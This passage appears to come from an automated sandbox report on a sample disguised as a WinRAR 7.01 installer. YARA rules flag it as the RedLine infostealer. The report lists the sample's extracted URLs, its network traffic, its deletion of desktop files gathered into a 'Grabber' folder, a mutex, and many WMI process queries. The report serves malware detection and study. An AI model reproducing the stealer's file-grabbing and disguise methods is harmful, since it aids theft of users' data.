          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: tmp22D7.tmp.dat.3.drString found in binary or memory: https://support.mozilla.org
          Source: tmp22D7.tmp.dat.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: tmp22D7.tmp.dat.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
          Source: History.txt.3.dr, tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: History.txt.3.dr, tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://www.ecosia.org/newtab/
          Source: tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: tmp22D7.tmp.dat.3.drString found in binary or memory: https://www.mozilla.org
          Source: tmp22D7.tmp.dat.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: tmp22D7.tmp.dat.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: History.txt0.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
          Source: places.raw.3.dr, tmp22D7.tmp.dat.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: tmp22D7.tmp.dat.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: places.raw.3.dr, tmp22D7.tmp.dat.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\WUTJSCBCFX.jpgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\DVWHKMNFNN.docxJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\ZBEDCJPBEY.jpgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.pngJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile deleted: C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN\LTKMYBSEYZ.xlsxJump to behavior

          System Summary

          barindex
          Source: WinRAR 7.01 Pro.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 3.0._microsoft_corporation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0.2.WinRAR 7.01 Pro.exe.3b4c9f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0.2.WinRAR 7.01 Pro.exe.3785570.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0.0.WinRAR 7.01 Pro.exe.52173.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 0.0.WinRAR 7.01 Pro.exe.50000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB0A20 SetWindowLongPtrW,NtdllDefWindowProc_W,NtdllDefWindowProc_W,1_2_00007FF6C3BB0A20
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3B9C4E0: CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00007FF6C3B9C4E0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3B953301_2_00007FF6C3B95330
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB41D01_2_00007FF6C3BB41D0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB49301_2_00007FF6C3BB4930
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BA5B4C1_2_00007FF6C3BA5B4C
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB5ABC1_2_00007FF6C3BB5ABC
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BA69601_2_00007FF6C3BA6960
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BD15181_2_00007FF6C3BD1518
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BA94DC1_2_00007FF6C3BA94DC
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BAD3C01_2_00007FF6C3BAD3C0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC83C01_2_00007FF6C3BC83C0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC13701_2_00007FF6C3BC1370
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC31D01_2_00007FF6C3BC31D0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3B9A1EC1_2_00007FF6C3B9A1EC
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC78AC1_2_00007FF6C3BC78AC
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC28401_2_00007FF6C3BC2840
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC17801_2_00007FF6C3BC1780
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3B947781_2_00007FF6C3B94778
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3B977541_2_00007FF6C3B97754
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC65C01_2_00007FF6C3BC65C0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC35D41_2_00007FF6C3BC35D4
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC15741_2_00007FF6C3BC1574
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB1CE81_2_00007FF6C3BB1CE8
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3B98BE01_2_00007FF6C3B98BE0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC1B901_2_00007FF6C3BC1B90
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC9B401_2_00007FF6C3BC9B40
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BCCB101_2_00007FF6C3BCCB10
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC19841_2_00007FF6C3BC1984
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BA89781_2_00007FF6C3BA8978
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BAF9B01_2_00007FF6C3BAF9B0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BAF04C1_2_00007FF6C3BAF04C
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BA7FC81_2_00007FF6C3BA7FC8
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BCCFAC1_2_00007FF6C3BCCFAC
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BAEEF01_2_00007FF6C3BAEEF0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3B9DE981_2_00007FF6C3B9DE98
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC1D941_2_00007FF6C3BC1D94
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BC7D401_2_00007FF6C3BC7D40
          Source: _microsoft_corporation.exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
          Source: WinRAR 7.01 Pro.exe, 00000000.00000002.1784885207.00000000009AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs WinRAR 7.01 Pro.exe
          Source: WinRAR 7.01 Pro.exeBinary or memory string: OriginalFilenameWindowsApplication1.exeH vs WinRAR 7.01 Pro.exe
          Source: WinRAR 7.01 Pro.exeBinary or memory string: OriginalFilenameWinRAR.exeD vs WinRAR 7.01 Pro.exe
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: WinRAR 7.01 Pro.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: WinRAR 7.01 Pro.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 3.0._microsoft_corporation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0.2.WinRAR 7.01 Pro.exe.3b4c9f8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0.2.WinRAR 7.01 Pro.exe.3785570.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0.0.WinRAR 7.01 Pro.exe.52173.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0.0.WinRAR 7.01 Pro.exe.50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: _microsoft_corporation.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9947721910612536
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.csCryptographic APIs: 'CreateDecryptor'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.csCryptographic APIs: 'CreateDecryptor'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.csCryptographic APIs: 'CreateDecryptor'
          Source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, pteXN7SPQvYX16605Cl.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@21/94@4/4
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3B9BA38 GetLastError,FormatMessageW,LocalFree,1_2_00007FF6C3B9BA38
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB1FEC FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalFree,1_2_00007FF6C3BB1FEC
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WinRAR 7.01 Pro.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2160:120:WilError_03
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeFile created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeJump to behavior
          Source: WinRAR 7.01 Pro.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: WinRAR 7.01 Pro.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
